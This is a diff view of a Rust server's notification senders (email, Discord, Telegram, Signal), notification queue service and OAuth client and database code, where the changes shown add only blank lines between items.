const INITIAL_RETRY_DELAY_MS: u64 = 500;
14
+
15
#[async_trait]
16
pub trait NotificationSender: Send + Sync {
17
fn channel(&self) -> NotificationChannel;
18
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError>;
19
}
20
+
21
#[derive(Debug, thiserror::Error)]
22
pub enum SendError {
23
#[error("Failed to spawn sendmail process: {0}")]
···
35
#[error("Max retries exceeded: {0}")]
36
MaxRetriesExceeded(String),
37
}
38
+
39
fn create_http_client() -> Client {
40
Client::builder()
41
.timeout(Duration::from_secs(HTTP_TIMEOUT_SECS))
···
43
.build()
44
.unwrap_or_else(|_| Client::new())
45
}
46
+
47
fn is_retryable_status(status: reqwest::StatusCode) -> bool {
48
status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS
49
}
50
+
51
async fn retry_delay(attempt: u32) {
52
let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt);
53
tokio::time::sleep(Duration::from_millis(delay_ms)).await;
54
}
55
+
56
pub fn sanitize_header_value(value: &str) -> String {
57
value.replace(['\r', '\n'], " ").trim().to_string()
58
}
59
+
60
pub fn is_valid_phone_number(number: &str) -> bool {
61
if number.len() < 2 || number.len() > 20 {
62
return false;
···
68
let remaining: String = chars.collect();
69
!remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit())
70
}
71
+
72
pub struct EmailSender {
73
from_address: String,
74
from_name: String,
75
sendmail_path: String,
76
}
77
+
78
impl EmailSender {
79
pub fn new(from_address: String, from_name: String) -> Self {
80
Self {
···
83
sendmail_path: std::env::var("SENDMAIL_PATH").unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()),
84
}
85
}
86
+
87
pub fn from_env() -> Option<Self> {
88
let from_address = std::env::var("MAIL_FROM_ADDRESS").ok()?;
89
let from_name = std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "BSPDS".to_string());
90
Some(Self::new(from_address, from_name))
91
}
92
+
93
pub fn format_email(&self, notification: &QueuedNotification) -> String {
94
let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
95
let recipient = sanitize_header_value(¬ification.recipient);
···
107
)
108
}
109
}
110
+
111
#[async_trait]
112
impl NotificationSender for EmailSender {
113
fn channel(&self) -> NotificationChannel {
114
NotificationChannel::Email
115
}
116
+
117
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
118
let email_content = self.format_email(notification);
119
let mut child = Command::new(&self.sendmail_path)
···
134
Ok(())
135
}
136
}
137
+
138
pub struct DiscordSender {
139
webhook_url: String,
140
http_client: Client,
141
}
142
+
143
impl DiscordSender {
144
pub fn new(webhook_url: String) -> Self {
145
Self {
···
147
http_client: create_http_client(),
148
}
149
}
150
+
151
pub fn from_env() -> Option<Self> {
152
let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?;
153
Some(Self::new(webhook_url))
154
}
155
}
156
+
157
#[async_trait]
158
impl NotificationSender for DiscordSender {
159
fn channel(&self) -> NotificationChannel {
160
NotificationChannel::Discord
161
}
162
+
163
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
164
let subject = notification.subject.as_deref().unwrap_or("Notification");
165
let content = format!("**{}**\n\n{}", subject, notification.body);
···
213
))
214
}
215
}
216
+
217
pub struct TelegramSender {
218
bot_token: String,
219
http_client: Client,
220
}
221
+
222
impl TelegramSender {
223
pub fn new(bot_token: String) -> Self {
224
Self {
···
226
http_client: create_http_client(),
227
}
228
}
229
+
230
pub fn from_env() -> Option<Self> {
231
let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?;
232
Some(Self::new(bot_token))
233
}
234
}
235
+
236
#[async_trait]
237
impl NotificationSender for TelegramSender {
238
fn channel(&self) -> NotificationChannel {
239
NotificationChannel::Telegram
240
}
241
+
242
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
243
let chat_id = ¬ification.recipient;
244
let subject = notification.subject.as_deref().unwrap_or("Notification");
···
298
))
299
}
300
}
301
+
302
pub struct SignalSender {
303
signal_cli_path: String,
304
sender_number: String,
305
}
306
+
307
impl SignalSender {
308
pub fn new(signal_cli_path: String, sender_number: String) -> Self {
309
Self {
···
311
sender_number,
312
}
313
}
314
+
315
pub fn from_env() -> Option<Self> {
316
let signal_cli_path = std::env::var("SIGNAL_CLI_PATH")
317
.unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string());
···
319
Some(Self::new(signal_cli_path, sender_number))
320
}
321
}
322
+
323
#[async_trait]
324
impl NotificationSender for SignalSender {
325
fn channel(&self) -> NotificationChannel {
326
NotificationChannel::Signal
327
}
328
+
329
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
330
let recipient = ¬ification.recipient;
331
if !is_valid_phone_number(recipient) {
+27
src/notifications/service.rs
+27
src/notifications/service.rs
···
1
use std::collections::HashMap;
2
use std::sync::Arc;
3
use std::time::Duration;
4
use chrono::Utc;
5
use sqlx::PgPool;
6
use tokio::sync::watch;
7
use tokio::time::interval;
8
use tracing::{debug, error, info, warn};
9
use uuid::Uuid;
10
use super::sender::{NotificationSender, SendError};
11
use super::types::{NewNotification, NotificationChannel, NotificationStatus, QueuedNotification};
12
pub struct NotificationService {
13
db: PgPool,
14
senders: HashMap<NotificationChannel, Arc<dyn NotificationSender>>,
15
poll_interval: Duration,
16
batch_size: i64,
17
}
18
impl NotificationService {
19
pub fn new(db: PgPool) -> Self {
20
let poll_interval_ms: u64 = std::env::var("NOTIFICATION_POLL_INTERVAL_MS")
···
32
batch_size,
33
}
34
}
35
pub fn with_poll_interval(mut self, interval: Duration) -> Self {
36
self.poll_interval = interval;
37
self
38
}
39
pub fn with_batch_size(mut self, size: i64) -> Self {
40
self.batch_size = size;
41
self
42
}
43
pub fn register_sender<S: NotificationSender + 'static>(mut self, sender: S) -> Self {
44
self.senders.insert(sender.channel(), Arc::new(sender));
45
self
46
}
47
pub async fn enqueue(&self, notification: NewNotification) -> Result<Uuid, sqlx::Error> {
48
let id = sqlx::query_scalar!(
49
r#"
···
65
debug!(notification_id = %id, "Notification enqueued");
66
Ok(id)
67
}
68
pub fn has_senders(&self) -> bool {
69
!self.senders.is_empty()
70
}
71
pub async fn run(self, mut shutdown: watch::Receiver<bool>) {
72
if self.senders.is_empty() {
73
warn!("Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured.");
···
95
}
96
}
97
}
98
async fn process_batch(&self) -> Result<(), sqlx::Error> {
99
let notifications = self.fetch_pending_notifications().await?;
100
if notifications.is_empty() {
···
106
}
107
Ok(())
108
}
109
async fn fetch_pending_notifications(&self) -> Result<Vec<QueuedNotification>, sqlx::Error> {
110
let now = Utc::now();
111
sqlx::query_as!(
···
137
.fetch_all(&self.db)
138
.await
139
}
140
async fn process_notification(&self, notification: QueuedNotification) {
141
let notification_id = notification.id;
142
let channel = notification.channel;
···
179
}
180
}
181
}
182
async fn mark_sent(&self, id: Uuid) -> Result<(), sqlx::Error> {
183
sqlx::query!(
184
r#"
···
192
.await?;
193
Ok(())
194
}
195
async fn mark_failed(&self, id: Uuid, error: &str) -> Result<(), sqlx::Error> {
196
sqlx::query!(
197
r#"
···
215
Ok(())
216
}
217
}
218
pub async fn enqueue_notification(db: &PgPool, notification: NewNotification) -> Result<Uuid, sqlx::Error> {
219
sqlx::query_scalar!(
220
r#"
···
234
.fetch_one(db)
235
.await
236
}
237
pub struct UserNotificationPrefs {
238
pub channel: NotificationChannel,
239
pub email: Option<String>,
240
pub handle: String,
241
}
242
pub async fn get_user_notification_prefs(
243
db: &PgPool,
244
user_id: Uuid,
···
262
handle: row.handle,
263
})
264
}
265
pub async fn enqueue_welcome(
266
db: &PgPool,
267
user_id: Uuid,
···
285
)
286
.await
287
}
288
pub async fn enqueue_email_verification(
289
db: &PgPool,
290
user_id: Uuid,
···
309
)
310
.await
311
}
312
pub async fn enqueue_password_reset(
313
db: &PgPool,
314
user_id: Uuid,
···
333
)
334
.await
335
}
336
pub async fn enqueue_email_update(
337
db: &PgPool,
338
user_id: Uuid,
···
357
)
358
.await
359
}
360
pub async fn enqueue_account_deletion(
361
db: &PgPool,
362
user_id: Uuid,
···
381
)
382
.await
383
}
384
pub async fn enqueue_plc_operation(
385
db: &PgPool,
386
user_id: Uuid,
···
405
)
406
.await
407
}
408
pub async fn enqueue_2fa_code(
409
db: &PgPool,
410
user_id: Uuid,
···
429
)
430
.await
431
}
432
pub fn channel_display_name(channel: NotificationChannel) -> &'static str {
433
match channel {
434
NotificationChannel::Email => "email",
···
437
NotificationChannel::Signal => "Signal",
438
}
439
}
440
pub async fn enqueue_signup_verification(
441
db: &PgPool,
442
user_id: Uuid,
···
1
use std::collections::HashMap;
2
use std::sync::Arc;
3
use std::time::Duration;
4
+
5
use chrono::Utc;
6
use sqlx::PgPool;
7
use tokio::sync::watch;
8
use tokio::time::interval;
9
use tracing::{debug, error, info, warn};
10
use uuid::Uuid;
11
+
12
use super::sender::{NotificationSender, SendError};
13
use super::types::{NewNotification, NotificationChannel, NotificationStatus, QueuedNotification};
14
+
15
pub struct NotificationService {
16
db: PgPool,
17
senders: HashMap<NotificationChannel, Arc<dyn NotificationSender>>,
18
poll_interval: Duration,
19
batch_size: i64,
20
}
21
+
22
impl NotificationService {
23
pub fn new(db: PgPool) -> Self {
24
let poll_interval_ms: u64 = std::env::var("NOTIFICATION_POLL_INTERVAL_MS")
···
36
batch_size,
37
}
38
}
39
+
40
pub fn with_poll_interval(mut self, interval: Duration) -> Self {
41
self.poll_interval = interval;
42
self
43
}
44
+
45
pub fn with_batch_size(mut self, size: i64) -> Self {
46
self.batch_size = size;
47
self
48
}
49
+
50
pub fn register_sender<S: NotificationSender + 'static>(mut self, sender: S) -> Self {
51
self.senders.insert(sender.channel(), Arc::new(sender));
52
self
53
}
54
+
55
pub async fn enqueue(&self, notification: NewNotification) -> Result<Uuid, sqlx::Error> {
56
let id = sqlx::query_scalar!(
57
r#"
···
73
debug!(notification_id = %id, "Notification enqueued");
74
Ok(id)
75
}
76
+
77
pub fn has_senders(&self) -> bool {
78
!self.senders.is_empty()
79
}
80
+
81
pub async fn run(self, mut shutdown: watch::Receiver<bool>) {
82
if self.senders.is_empty() {
83
warn!("Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured.");
···
105
}
106
}
107
}
108
+
109
async fn process_batch(&self) -> Result<(), sqlx::Error> {
110
let notifications = self.fetch_pending_notifications().await?;
111
if notifications.is_empty() {
···
117
}
118
Ok(())
119
}
120
+
121
async fn fetch_pending_notifications(&self) -> Result<Vec<QueuedNotification>, sqlx::Error> {
122
let now = Utc::now();
123
sqlx::query_as!(
···
149
.fetch_all(&self.db)
150
.await
151
}
152
+
153
async fn process_notification(&self, notification: QueuedNotification) {
154
let notification_id = notification.id;
155
let channel = notification.channel;
···
192
}
193
}
194
}
195
+
196
async fn mark_sent(&self, id: Uuid) -> Result<(), sqlx::Error> {
197
sqlx::query!(
198
r#"
···
206
.await?;
207
Ok(())
208
}
209
+
210
async fn mark_failed(&self, id: Uuid, error: &str) -> Result<(), sqlx::Error> {
211
sqlx::query!(
212
r#"
···
230
Ok(())
231
}
232
}
233
+
234
pub async fn enqueue_notification(db: &PgPool, notification: NewNotification) -> Result<Uuid, sqlx::Error> {
235
sqlx::query_scalar!(
236
r#"
···
250
.fetch_one(db)
251
.await
252
}
253
+
254
pub struct UserNotificationPrefs {
255
pub channel: NotificationChannel,
256
pub email: Option<String>,
257
pub handle: String,
258
}
259
+
260
pub async fn get_user_notification_prefs(
261
db: &PgPool,
262
user_id: Uuid,
···
280
handle: row.handle,
281
})
282
}
283
+
284
pub async fn enqueue_welcome(
285
db: &PgPool,
286
user_id: Uuid,
···
304
)
305
.await
306
}
307
+
308
pub async fn enqueue_email_verification(
309
db: &PgPool,
310
user_id: Uuid,
···
329
)
330
.await
331
}
332
+
333
pub async fn enqueue_password_reset(
334
db: &PgPool,
335
user_id: Uuid,
···
354
)
355
.await
356
}
357
+
358
pub async fn enqueue_email_update(
359
db: &PgPool,
360
user_id: Uuid,
···
379
)
380
.await
381
}
382
+
383
pub async fn enqueue_account_deletion(
384
db: &PgPool,
385
user_id: Uuid,
···
404
)
405
.await
406
}
407
+
408
pub async fn enqueue_plc_operation(
409
db: &PgPool,
410
user_id: Uuid,
···
429
)
430
.await
431
}
432
+
433
pub async fn enqueue_2fa_code(
434
db: &PgPool,
435
user_id: Uuid,
···
454
)
455
.await
456
}
457
+
458
pub fn channel_display_name(channel: NotificationChannel) -> &'static str {
459
match channel {
460
NotificationChannel::Email => "email",
···
463
NotificationChannel::Signal => "Signal",
464
}
465
}
466
+
467
pub async fn enqueue_signup_verification(
468
db: &PgPool,
469
user_id: Uuid,
+7
src/notifications/types.rs
+7
src/notifications/types.rs
···
2
use serde::{Deserialize, Serialize};
3
use sqlx::FromRow;
4
use uuid::Uuid;
5
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, sqlx::Type, Serialize, Deserialize)]
6
#[sqlx(type_name = "notification_channel", rename_all = "lowercase")]
7
pub enum NotificationChannel {
···
10
Telegram,
11
Signal,
12
}
13
#[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)]
14
#[sqlx(type_name = "notification_status", rename_all = "lowercase")]
15
pub enum NotificationStatus {
···
18
Sent,
19
Failed,
20
}
21
#[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)]
22
#[sqlx(type_name = "notification_type", rename_all = "snake_case")]
23
pub enum NotificationType {
···
30
PlcOperation,
31
TwoFactorCode,
32
}
33
#[derive(Debug, Clone, FromRow)]
34
pub struct QueuedNotification {
35
pub id: Uuid,
···
49
pub scheduled_for: DateTime<Utc>,
50
pub processed_at: Option<DateTime<Utc>>,
51
}
52
pub struct NewNotification {
53
pub user_id: Uuid,
54
pub channel: NotificationChannel,
···
58
pub body: String,
59
pub metadata: Option<serde_json::Value>,
60
}
61
impl NewNotification {
62
pub fn new(
63
user_id: Uuid,
···
77
metadata: None,
78
}
79
}
80
pub fn email(
81
user_id: Uuid,
82
notification_type: NotificationType,
···
2
use serde::{Deserialize, Serialize};
3
use sqlx::FromRow;
4
use uuid::Uuid;
5
+
6
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, sqlx::Type, Serialize, Deserialize)]
7
#[sqlx(type_name = "notification_channel", rename_all = "lowercase")]
8
pub enum NotificationChannel {
···
11
Telegram,
12
Signal,
13
}
14
+
15
#[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)]
16
#[sqlx(type_name = "notification_status", rename_all = "lowercase")]
17
pub enum NotificationStatus {
···
20
Sent,
21
Failed,
22
}
23
+
24
#[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)]
25
#[sqlx(type_name = "notification_type", rename_all = "snake_case")]
26
pub enum NotificationType {
···
33
PlcOperation,
34
TwoFactorCode,
35
}
36
+
37
#[derive(Debug, Clone, FromRow)]
38
pub struct QueuedNotification {
39
pub id: Uuid,
···
53
pub scheduled_for: DateTime<Utc>,
54
pub processed_at: Option<DateTime<Utc>>,
55
}
56
+
57
pub struct NewNotification {
58
pub user_id: Uuid,
59
pub channel: NotificationChannel,
···
63
pub body: String,
64
pub metadata: Option<serde_json::Value>,
65
}
66
+
67
impl NewNotification {
68
pub fn new(
69
user_id: Uuid,
···
83
metadata: None,
84
}
85
}
86
+
87
pub fn email(
88
user_id: Uuid,
89
notification_type: NotificationType,
+22
src/oauth/client.rs
+22
src/oauth/client.rs
···
3
use std::collections::HashMap;
4
use std::sync::Arc;
5
use tokio::sync::RwLock;
6
use super::OAuthError;
7
#[derive(Debug, Clone, Serialize, Deserialize)]
8
pub struct ClientMetadata {
9
pub client_id: String,
···
31
#[serde(skip_serializing_if = "Option::is_none")]
32
pub application_type: Option<String>,
33
}
34
impl Default for ClientMetadata {
35
fn default() -> Self {
36
Self {
···
50
}
51
}
52
}
53
#[derive(Clone)]
54
pub struct ClientMetadataCache {
55
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
···
57
http_client: Client,
58
cache_ttl_secs: u64,
59
}
60
struct CachedMetadata {
61
metadata: ClientMetadata,
62
cached_at: std::time::Instant,
63
}
64
struct CachedJwks {
65
jwks: serde_json::Value,
66
cached_at: std::time::Instant,
67
}
68
impl ClientMetadataCache {
69
pub fn new(cache_ttl_secs: u64) -> Self {
70
Self {
···
78
cache_ttl_secs,
79
}
80
}
81
pub async fn get(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
82
{
83
let cache = self.cache.read().await;
···
100
}
101
Ok(metadata)
102
}
103
pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
104
if let Some(jwks) = &metadata.jwks {
105
return Ok(jwks.clone());
···
130
}
131
Ok(jwks)
132
}
133
async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
134
if !jwks_uri.starts_with("https://") {
135
if !jwks_uri.starts_with("http://")
···
166
}
167
Ok(jwks)
168
}
169
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
170
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
171
return Err(OAuthError::InvalidClient(
···
207
self.validate_metadata(&metadata)?;
208
Ok(metadata)
209
}
210
fn validate_metadata(&self, metadata: &ClientMetadata) -> Result<(), OAuthError> {
211
if metadata.redirect_uris.is_empty() {
212
return Err(OAuthError::InvalidClient(
···
232
}
233
Ok(())
234
}
235
pub fn validate_redirect_uri(
236
&self,
237
metadata: &ClientMetadata,
···
244
}
245
Ok(())
246
}
247
fn validate_redirect_uri_format(&self, uri: &str) -> Result<(), OAuthError> {
248
if uri.contains('#') {
249
return Err(OAuthError::InvalidClient(
···
278
Ok(())
279
}
280
}
281
impl ClientMetadata {
282
pub fn requires_dpop(&self) -> bool {
283
self.dpop_bound_access_tokens.unwrap_or(false)
284
}
285
pub fn auth_method(&self) -> &str {
286
self.token_endpoint_auth_method
287
.as_deref()
288
.unwrap_or("none")
289
}
290
}
291
pub async fn verify_client_auth(
292
cache: &ClientMetadataCache,
293
metadata: &ClientMetadata,
···
321
))),
322
}
323
}
324
async fn verify_private_key_jwt_async(
325
cache: &ClientMetadataCache,
326
metadata: &ClientMetadata,
···
425
"client_assertion signature verification failed".to_string(),
426
))
427
}
428
fn verify_es256(
429
key: &serde_json::Value,
430
signing_input: &str,
···
456
.verify(signing_input.as_bytes(), &sig)
457
.map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string()))
458
}
459
fn verify_es384(
460
key: &serde_json::Value,
461
signing_input: &str,
···
487
.verify(signing_input.as_bytes(), &sig)
488
.map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string()))
489
}
490
fn verify_rsa(
491
_alg: &str,
492
_key: &serde_json::Value,
···
497
"RSA signature verification not yet supported - use EC keys".to_string(),
498
))
499
}
500
fn verify_eddsa(
501
key: &serde_json::Value,
502
signing_input: &str,
···
3
use std::collections::HashMap;
4
use std::sync::Arc;
5
use tokio::sync::RwLock;
6
+
7
use super::OAuthError;
8
+
9
#[derive(Debug, Clone, Serialize, Deserialize)]
10
pub struct ClientMetadata {
11
pub client_id: String,
···
33
#[serde(skip_serializing_if = "Option::is_none")]
34
pub application_type: Option<String>,
35
}
36
+
37
impl Default for ClientMetadata {
38
fn default() -> Self {
39
Self {
···
53
}
54
}
55
}
56
+
57
#[derive(Clone)]
58
pub struct ClientMetadataCache {
59
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
···
61
http_client: Client,
62
cache_ttl_secs: u64,
63
}
64
+
65
struct CachedMetadata {
66
metadata: ClientMetadata,
67
cached_at: std::time::Instant,
68
}
69
+
70
struct CachedJwks {
71
jwks: serde_json::Value,
72
cached_at: std::time::Instant,
73
}
74
+
75
impl ClientMetadataCache {
76
pub fn new(cache_ttl_secs: u64) -> Self {
77
Self {
···
85
cache_ttl_secs,
86
}
87
}
88
+
89
pub async fn get(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
90
{
91
let cache = self.cache.read().await;
···
108
}
109
Ok(metadata)
110
}
111
+
112
pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
113
if let Some(jwks) = &metadata.jwks {
114
return Ok(jwks.clone());
···
139
}
140
Ok(jwks)
141
}
142
+
143
async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
144
if !jwks_uri.starts_with("https://") {
145
if !jwks_uri.starts_with("http://")
···
176
}
177
Ok(jwks)
178
}
179
+
180
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
181
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
182
return Err(OAuthError::InvalidClient(
···
218
self.validate_metadata(&metadata)?;
219
Ok(metadata)
220
}
221
+
222
fn validate_metadata(&self, metadata: &ClientMetadata) -> Result<(), OAuthError> {
223
if metadata.redirect_uris.is_empty() {
224
return Err(OAuthError::InvalidClient(
···
244
}
245
Ok(())
246
}
247
+
248
pub fn validate_redirect_uri(
249
&self,
250
metadata: &ClientMetadata,
···
257
}
258
Ok(())
259
}
260
+
261
fn validate_redirect_uri_format(&self, uri: &str) -> Result<(), OAuthError> {
262
if uri.contains('#') {
263
return Err(OAuthError::InvalidClient(
···
292
Ok(())
293
}
294
}
295
+
296
impl ClientMetadata {
297
pub fn requires_dpop(&self) -> bool {
298
self.dpop_bound_access_tokens.unwrap_or(false)
299
}
300
+
301
pub fn auth_method(&self) -> &str {
302
self.token_endpoint_auth_method
303
.as_deref()
304
.unwrap_or("none")
305
}
306
}
307
+
308
pub async fn verify_client_auth(
309
cache: &ClientMetadataCache,
310
metadata: &ClientMetadata,
···
338
))),
339
}
340
}
341
+
342
async fn verify_private_key_jwt_async(
343
cache: &ClientMetadataCache,
344
metadata: &ClientMetadata,
···
443
"client_assertion signature verification failed".to_string(),
444
))
445
}
446
+
447
fn verify_es256(
448
key: &serde_json::Value,
449
signing_input: &str,
···
475
.verify(signing_input.as_bytes(), &sig)
476
.map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string()))
477
}
478
+
479
fn verify_es384(
480
key: &serde_json::Value,
481
signing_input: &str,
···
507
.verify(signing_input.as_bytes(), &sig)
508
.map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string()))
509
}
510
+
511
fn verify_rsa(
512
_alg: &str,
513
_key: &serde_json::Value,
···
518
"RSA signature verification not yet supported - use EC keys".to_string(),
519
))
520
}
521
+
522
fn verify_eddsa(
523
key: &serde_json::Value,
524
signing_input: &str,
+2
src/oauth/db/client.rs
+2
src/oauth/db/client.rs
···
1
use sqlx::PgPool;
2
use super::super::{AuthorizedClientData, OAuthError};
3
use super::helpers::{from_json, to_json};
4
+
5
pub async fn upsert_authorized_client(
6
pool: &PgPool,
7
did: &str,
···
23
.await?;
24
Ok(())
25
}
26
+
27
pub async fn get_authorized_client(
28
pool: &PgPool,
29
did: &str,
+8
src/oauth/db/device.rs
+8
src/oauth/db/device.rs
···
1
use chrono::{DateTime, Utc};
2
use sqlx::PgPool;
3
use super::super::{DeviceData, OAuthError};
4
pub struct DeviceAccountRow {
5
pub did: String,
6
pub handle: String,
7
pub email: Option<String>,
8
pub last_used_at: DateTime<Utc>,
9
}
10
pub async fn create_device(
11
pool: &PgPool,
12
device_id: &str,
···
27
.await?;
28
Ok(())
29
}
30
pub async fn get_device(pool: &PgPool, device_id: &str) -> Result<Option<DeviceData>, OAuthError> {
31
let row = sqlx::query!(
32
r#"
···
45
last_seen_at: r.last_seen_at,
46
}))
47
}
48
pub async fn update_device_last_seen(
49
pool: &PgPool,
50
device_id: &str,
···
61
.await?;
62
Ok(())
63
}
64
pub async fn delete_device(pool: &PgPool, device_id: &str) -> Result<(), OAuthError> {
65
sqlx::query!(
66
r#"
···
72
.await?;
73
Ok(())
74
}
75
pub async fn upsert_account_device(
76
pool: &PgPool,
77
did: &str,
···
90
.await?;
91
Ok(())
92
}
93
pub async fn get_device_accounts(
94
pool: &PgPool,
95
device_id: &str,
···
118
})
119
.collect())
120
}
121
pub async fn verify_account_on_device(
122
pool: &PgPool,
123
device_id: &str,
···
1
use chrono::{DateTime, Utc};
2
use sqlx::PgPool;
3
use super::super::{DeviceData, OAuthError};
4
+
5
pub struct DeviceAccountRow {
6
pub did: String,
7
pub handle: String,
8
pub email: Option<String>,
9
pub last_used_at: DateTime<Utc>,
10
}
11
+
12
pub async fn create_device(
13
pool: &PgPool,
14
device_id: &str,
···
29
.await?;
30
Ok(())
31
}
32
+
33
pub async fn get_device(pool: &PgPool, device_id: &str) -> Result<Option<DeviceData>, OAuthError> {
34
let row = sqlx::query!(
35
r#"
···
48
last_seen_at: r.last_seen_at,
49
}))
50
}
51
+
52
pub async fn update_device_last_seen(
53
pool: &PgPool,
54
device_id: &str,
···
65
.await?;
66
Ok(())
67
}
68
+
69
pub async fn delete_device(pool: &PgPool, device_id: &str) -> Result<(), OAuthError> {
70
sqlx::query!(
71
r#"
···
77
.await?;
78
Ok(())
79
}
80
+
81
pub async fn upsert_account_device(
82
pool: &PgPool,
83
did: &str,
···
96
.await?;
97
Ok(())
98
}
99
+
100
pub async fn get_device_accounts(
101
pool: &PgPool,
102
device_id: &str,
···
125
})
126
.collect())
127
}
128
+
129
pub async fn verify_account_on_device(
130
pool: &PgPool,
131
device_id: &str,
+2
src/oauth/db/dpop.rs
+2
src/oauth/db/dpop.rs
+2
src/oauth/db/helpers.rs
+2
src/oauth/db/helpers.rs
···
1
use serde::{de::DeserializeOwned, Serialize};
2
use super::super::OAuthError;
3
pub fn to_json<T: Serialize>(value: &T) -> Result<serde_json::Value, OAuthError> {
4
serde_json::to_value(value).map_err(|e| {
5
tracing::error!("JSON serialization error: {}", e);
6
OAuthError::ServerError("Internal serialization error".to_string())
7
})
8
}
9
pub fn from_json<T: DeserializeOwned>(value: serde_json::Value) -> Result<T, OAuthError> {
10
serde_json::from_value(value).map_err(|e| {
11
tracing::error!("JSON deserialization error: {}", e);
···
1
use serde::{de::DeserializeOwned, Serialize};
2
use super::super::OAuthError;
3
+
4
pub fn to_json<T: Serialize>(value: &T) -> Result<serde_json::Value, OAuthError> {
5
serde_json::to_value(value).map_err(|e| {
6
tracing::error!("JSON serialization error: {}", e);
7
OAuthError::ServerError("Internal serialization error".to_string())
8
})
9
}
10
+
11
pub fn from_json<T: DeserializeOwned>(value: serde_json::Value) -> Result<T, OAuthError> {
12
serde_json::from_value(value).map_err(|e| {
13
tracing::error!("JSON deserialization error: {}", e);
+1
src/oauth/db/mod.rs
+1
src/oauth/db/mod.rs
+6
src/oauth/db/request.rs
+6
src/oauth/db/request.rs
···
1
use sqlx::PgPool;
2
use super::super::{AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData};
3
use super::helpers::{from_json, to_json};
4
pub async fn create_authorization_request(
5
pool: &PgPool,
6
request_id: &str,
···
30
.await?;
31
Ok(())
32
}
33
pub async fn get_authorization_request(
34
pool: &PgPool,
35
request_id: &str,
···
64
None => Ok(None),
65
}
66
}
67
pub async fn update_authorization_request(
68
pool: &PgPool,
69
request_id: &str,
···
86
.await?;
87
Ok(())
88
}
89
pub async fn consume_authorization_request_by_code(
90
pool: &PgPool,
91
code: &str,
···
120
None => Ok(None),
121
}
122
}
123
pub async fn delete_authorization_request(
124
pool: &PgPool,
125
request_id: &str,
···
134
.await?;
135
Ok(())
136
}
137
pub async fn delete_expired_authorization_requests(pool: &PgPool) -> Result<u64, OAuthError> {
138
let result = sqlx::query!(
139
r#"
···
1
use sqlx::PgPool;
2
use super::super::{AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData};
3
use super::helpers::{from_json, to_json};
4
+
5
pub async fn create_authorization_request(
6
pool: &PgPool,
7
request_id: &str,
···
31
.await?;
32
Ok(())
33
}
34
+
35
pub async fn get_authorization_request(
36
pool: &PgPool,
37
request_id: &str,
···
66
None => Ok(None),
67
}
68
}
69
+
70
pub async fn update_authorization_request(
71
pool: &PgPool,
72
request_id: &str,
···
89
.await?;
90
Ok(())
91
}
92
+
93
pub async fn consume_authorization_request_by_code(
94
pool: &PgPool,
95
code: &str,
···
124
None => Ok(None),
125
}
126
}
127
+
128
pub async fn delete_authorization_request(
129
pool: &PgPool,
130
request_id: &str,
···
139
.await?;
140
Ok(())
141
}
142
+
143
pub async fn delete_expired_authorization_requests(pool: &PgPool) -> Result<u64, OAuthError> {
144
let result = sqlx::query!(
145
r#"
+12
src/oauth/db/token.rs
+12
src/oauth/db/token.rs
···
2
use sqlx::PgPool;
3
use super::super::{OAuthError, TokenData};
4
use super::helpers::{from_json, to_json};
5
pub async fn create_token(
6
pool: &PgPool,
7
data: &TokenData,
···
34
.await?;
35
Ok(row.id)
36
}
37
pub async fn get_token_by_id(
38
pool: &PgPool,
39
token_id: &str,
···
68
None => Ok(None),
69
}
70
}
71
pub async fn get_token_by_refresh_token(
72
pool: &PgPool,
73
refresh_token: &str,
···
105
None => Ok(None),
106
}
107
}
108
pub async fn rotate_token(
109
pool: &PgPool,
110
old_db_id: i32,
···
149
tx.commit().await?;
150
Ok(())
151
}
152
pub async fn check_refresh_token_used(
153
pool: &PgPool,
154
refresh_token: &str,
···
163
.await?;
164
Ok(row)
165
}
166
pub async fn delete_token(pool: &PgPool, token_id: &str) -> Result<(), OAuthError> {
167
sqlx::query!(
168
r#"
···
174
.await?;
175
Ok(())
176
}
177
pub async fn delete_token_family(pool: &PgPool, db_id: i32) -> Result<(), OAuthError> {
178
sqlx::query!(
179
r#"
···
185
.await?;
186
Ok(())
187
}
188
pub async fn list_tokens_for_user(
189
pool: &PgPool,
190
did: &str,
